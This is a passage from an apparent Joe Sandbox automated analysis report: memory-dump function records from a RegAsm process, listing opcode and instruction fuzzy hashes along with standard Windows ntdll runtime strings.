                                                                                                                          • Opcode Fuzzy Hash: 3238fa9222c22266a7f33f06037fc67a48c5eba744858a7bf0ffddc8c75a64e0
                                                                                                                          • Instruction Fuzzy Hash: A690047131140053D505715CC4047071055C7F13C1F55C013F315C554CC53DCD717135
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d442d3514e64d14476f569de5967103e5b8871c5f669069cf6141668b3bfa037
                                                                                                                          • Instruction ID: e5211ba84cd3cd86996592eee33eef8c71926c277098925e6a5c40b751c71ecb
                                                                                                                          • Opcode Fuzzy Hash: d442d3514e64d14476f569de5967103e5b8871c5f669069cf6141668b3bfa037
                                                                                                                          • Instruction Fuzzy Hash: 2290026134140452D50171588414B071015C7E1381F55C015F2068554D861DCD527126
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8c4161b590d7b048da4522762045a3aad17f507bc4bee9971a5a8b80a9d4037e
                                                                                                                          • Instruction ID: 4a8a4c711d57f96c006053117ecc427b2420db205ae389574e5d8af17dc6a6ed
                                                                                                                          • Opcode Fuzzy Hash: 8c4161b590d7b048da4522762045a3aad17f507bc4bee9971a5a8b80a9d4037e
                                                                                                                          • Instruction Fuzzy Hash: 1590043130140413D501715CD50C7071015C7D03C1F55D411F143C55CDD75FCD517131
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7c40a2b57ad4e44a31464fe381fdf50b94d10f2b33ffbb5e15829d8147ae7fec
                                                                                                                          • Instruction ID: 2cb816a495bae5d7c2d485123154be91f504766f652787d40dfc1a82944f6069
                                                                                                                          • Opcode Fuzzy Hash: 7c40a2b57ad4e44a31464fe381fdf50b94d10f2b33ffbb5e15829d8147ae7fec
                                                                                                                          • Instruction Fuzzy Hash: CF90022160540412D54171589418707102587D0281F55D011F1028554DC65D8B5576A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 791378b52e6971aaff65eb97af9fe9f8b9fd41b7eb2886450803663800dc2372
                                                                                                                          • Instruction ID: a3419f4cb2448af62bac8cedb3e8407b8536349ae85124a71c9a834c4d21453b
                                                                                                                          • Opcode Fuzzy Hash: 791378b52e6971aaff65eb97af9fe9f8b9fd41b7eb2886450803663800dc2372
                                                                                                                          • Instruction Fuzzy Hash: 5890023120140412D50175989408647101587E0381F55D011F6028555EC66989917131
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3bf5c951db2cc25c786ea91e207129672cf12d7bcc8f6101a97072f86a3c6d9
                                                                                                                          • Instruction ID: 41f4a24ca203851ec87a4b2dcc2637e4c325aa1bbad528f86861125921b78cdc
                                                                                                                          • Opcode Fuzzy Hash: e3bf5c951db2cc25c786ea91e207129672cf12d7bcc8f6101a97072f86a3c6d9
                                                                                                                          • Instruction Fuzzy Hash: DB90023120140852D50171588404B47101587E0381F55C016F1128654D8619C9517521
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 772b0fa265849fb771ad161c5e7cd2d858cb6dbc6fcbff4898ea026a46ca336c
                                                                                                                          • Instruction ID: a3faba036db1cb483012937c203c376fbc8cb0e58eecfc72575c38cd3c64cfbc
                                                                                                                          • Opcode Fuzzy Hash: 772b0fa265849fb771ad161c5e7cd2d858cb6dbc6fcbff4898ea026a46ca336c
                                                                                                                          • Instruction Fuzzy Hash: FF900221242441625946B1588404507501697E02C1795C012F2418950C852A9956E621
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 54b1219112c6d99a3bea36b8695a657983568550497b3574651219a6da39265e
                                                                                                                          • Instruction ID: 3d693d92268a9a78a152d3078944e08148b1ff7951640fe4ddb267fd1bfc9e10
                                                                                                                          • Opcode Fuzzy Hash: 54b1219112c6d99a3bea36b8695a657983568550497b3574651219a6da39265e
                                                                                                                          • Instruction Fuzzy Hash: 4A90023124140412D54271588404607101997D02C1F95C012F1428554E86598B56BA61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b08a65adb67ee95bb1223f5f7bbc1fe61acedad656f4ff986b493a2ece033faf
                                                                                                                          • Instruction ID: dbad4d1dea4d21dd106bfe781c6d37299670545658d6133b223ec8b948678888
                                                                                                                          • Opcode Fuzzy Hash: b08a65adb67ee95bb1223f5f7bbc1fe61acedad656f4ff986b493a2ece033faf
                                                                                                                          • Instruction Fuzzy Hash: 2A90023520140412D91171589804647105687D0381F55D411F1428558D865889A1B121
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: edaf9c1191180569c9def3dcc4ba9108eba9f739e9ad5fa047cdc4447178549c
                                                                                                                          • Instruction ID: bc09fd5525564079d71cd5aaf5675a9ce97846ddfaacf6df0ae80fe7990da285
                                                                                                                          • Opcode Fuzzy Hash: edaf9c1191180569c9def3dcc4ba9108eba9f739e9ad5fa047cdc4447178549c
                                                                                                                          • Instruction Fuzzy Hash: E990022130140013D541715894186075015D7E1381F55D011F1418554CD91989566222
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d50523e85d944866564f7169d8af21c9aa71d6b8834d6c8f5a8d7f09ccf3e30e
                                                                                                                          • Instruction ID: 457f9e0a0a7ce9b6b99b1dbd3ddd357dd4c87b741c0c87bb4973aa821c08fb20
                                                                                                                          • Opcode Fuzzy Hash: d50523e85d944866564f7169d8af21c9aa71d6b8834d6c8f5a8d7f09ccf3e30e
                                                                                                                          • Instruction Fuzzy Hash: 0A90022921340012D5817158940860B101587D1282F95D415F1019558CC91989696321
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 43d5905a73e87560dd2ba2363e238ceaa3ee339ede7d76a4a2fc5cb744a6c014
                                                                                                                          • Instruction ID: 3569b91c5ee9cc78e3e9716eefb7adb9f0e45c4e312340ea397b9f213889e94a
                                                                                                                          • Opcode Fuzzy Hash: 43d5905a73e87560dd2ba2363e238ceaa3ee339ede7d76a4a2fc5cb744a6c014
                                                                                                                          • Instruction Fuzzy Hash: F090023120240152994172589804A4F511587E1382B95D415F1019554CC91889616221
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7bfad8d38091eb48ba9cd8edc66effda9537b7ea722a098bfea8ea7b58c47d87
                                                                                                                          • Instruction ID: c74ae78c0adb597b7637817d3aeedfe7d0162751c8de0673d22513ac43cc6d47
                                                                                                                          • Opcode Fuzzy Hash: 7bfad8d38091eb48ba9cd8edc66effda9537b7ea722a098bfea8ea7b58c47d87
                                                                                                                          • Instruction Fuzzy Hash: 0490022120544452D50175589408A07101587D0285F55D011F2068595DC6398951B131
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction ID: e5404936edad45f512b495cf0861c339f8cf8358bab1c6f013d5f62b026c9f34
                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ___swprintf_l
                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                          • Opcode ID: af8268729a8817cc7a7d4baf012c22f6e24362686484ef585a380f62c7c72a2a
                                                                                                                          • Instruction ID: 9292af80e37fc908e856e3d052d9095bc4fd3821c542b8f9f1b4ef9a226c9cb2
                                                                                                                          • Opcode Fuzzy Hash: af8268729a8817cc7a7d4baf012c22f6e24362686484ef585a380f62c7c72a2a
                                                                                                                          • Instruction Fuzzy Hash: 42510BB6F001267FDB21DF98889097EF7B8BB09380B54C26AEA55D7641D734DE14CBA0
                                                                                                                          Strings
                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F546FC
                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F54725
                                                                                                                          • ExecuteOptions, xrefs: 02F546A0
                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F54787
                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F54655
                                                                                                                          • Execute=1, xrefs: 02F54713
                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F54742
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                          • API String ID: 0-484625025
                                                                                                                          • Opcode ID: 826cdec6d5556de37d702f9a71da22e8a00b5e5b48dc73d053d3d673a2f420d4
                                                                                                                          • Instruction ID: b9e4b1e9acb0d42f4ca724e780a7a9f972ec2c9d8e8f850e55b2bd9f467b3141
                                                                                                                          • Opcode Fuzzy Hash: 826cdec6d5556de37d702f9a71da22e8a00b5e5b48dc73d053d3d673a2f420d4
                                                                                                                          • Instruction Fuzzy Hash: D3511931A4021D6AEF10BFA4EC95FB9B7B9EF05384F540099E70AAB181E7719E45CF50
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __aulldvrm
                                                                                                                          • String ID: +$-$0$0
                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                          • Instruction ID: 23e952d7460417aa06228f7ad618ad279b62bad511ce10b5c0d8a4009c157312
                                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                          • Instruction Fuzzy Hash: AD81E370E052698EDF24CF68C851BFEBBB2AF4739CF184259DE61A7291C7348849CB50
                                                                                                                          Strings
                                                                                                                          • RTL: Re-Waiting, xrefs: 02F5031E
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F502E7
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F502BD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                          • API String ID: 0-2474120054
                                                                                                                          • Opcode ID: b206bed528a0b4c4b261db7e7501ece436d07f7e8d94be4bb1bb1ba60785a82b
                                                                                                                          • Instruction ID: 1df4cdbff273edb15d8cd587c2fcdfb5500c4d2279815b670f8a3be5fdd52508
                                                                                                                          • Opcode Fuzzy Hash: b206bed528a0b4c4b261db7e7501ece436d07f7e8d94be4bb1bb1ba60785a82b
                                                                                                                          • Instruction Fuzzy Hash: 54E1BF31A087419FD725CF28C884B2AB7E1BB89394F140A5DFB958B6E1DB74E845CB42
                                                                                                                          Strings
                                                                                                                          • RTL: Re-Waiting, xrefs: 02F57BAC
                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F57B7F
                                                                                                                          • RTL: Resource at %p, xrefs: 02F57B8E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                          • API String ID: 0-871070163
                                                                                                                          • Opcode ID: d1a2c7f948174bbadbd4950fcddbf6cb38882d5a68311e2a460c5022b6bd7441
                                                                                                                          • Instruction ID: fd68bb3c44299c05468de347b2879d7bc248d184da291c533bacb9e4678de79e
                                                                                                                          • Opcode Fuzzy Hash: d1a2c7f948174bbadbd4950fcddbf6cb38882d5a68311e2a460c5022b6bd7441
                                                                                                                          • Instruction Fuzzy Hash: 6341CF31B007029BD724DE25DD40B6AB7E6EF88794F500A1DFA5A9B680DB30E805CF91
                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F5728C
                                                                                                                          Strings
                                                                                                                          • RTL: Re-Waiting, xrefs: 02F572C1
                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F57294
                                                                                                                          • RTL: Resource at %p, xrefs: 02F572A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                          • Opcode ID: d308b80c192f5f4e7107109251bf1c1ead81a6cf3e1a18d275c26b7fb617c882
                                                                                                                          • Instruction ID: 70d19e1e4df4a631d1ed9090b6624f8515a3d4cc28d9e91313ce792648d4a084
                                                                                                                          • Opcode Fuzzy Hash: d308b80c192f5f4e7107109251bf1c1ead81a6cf3e1a18d275c26b7fb617c882
                                                                                                                          • Instruction Fuzzy Hash: 8741EF32B00252ABD721DE25CD41B6AB7A6FB94794F104619FF55EB680DB21E806CFD0
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __aulldvrm
                                                                                                                          • String ID: +$-
                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                          • Instruction ID: a36497dc6e37e6a71572b9616a9ed74bd635e8a27d2a1a3071a4b8c7d4d892b5
                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                          • Instruction Fuzzy Hash: 0E91E771E042369BDB24EE69C8917BEF7A1FF467E4F14451AEA11E72C0D7308948CB61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$@
                                                                                                                          • API String ID: 0-1194432280
                                                                                                                          • Opcode ID: 08af6f29f43b8083eef532441da094a0fe04629dd42d99203b107b342c7610b0
                                                                                                                          • Instruction ID: 16fd2abc4243e9c6504e6b4ebf78f7561cb82be55c09d58d3689c71a76221ee8
                                                                                                                          • Opcode Fuzzy Hash: 08af6f29f43b8083eef532441da094a0fe04629dd42d99203b107b342c7610b0
                                                                                                                          • Instruction Fuzzy Hash: 7D811D71D402699BDB25DB54CC44BEEB7B5AF08754F0181EAEA1DB7280D7705E84CFA0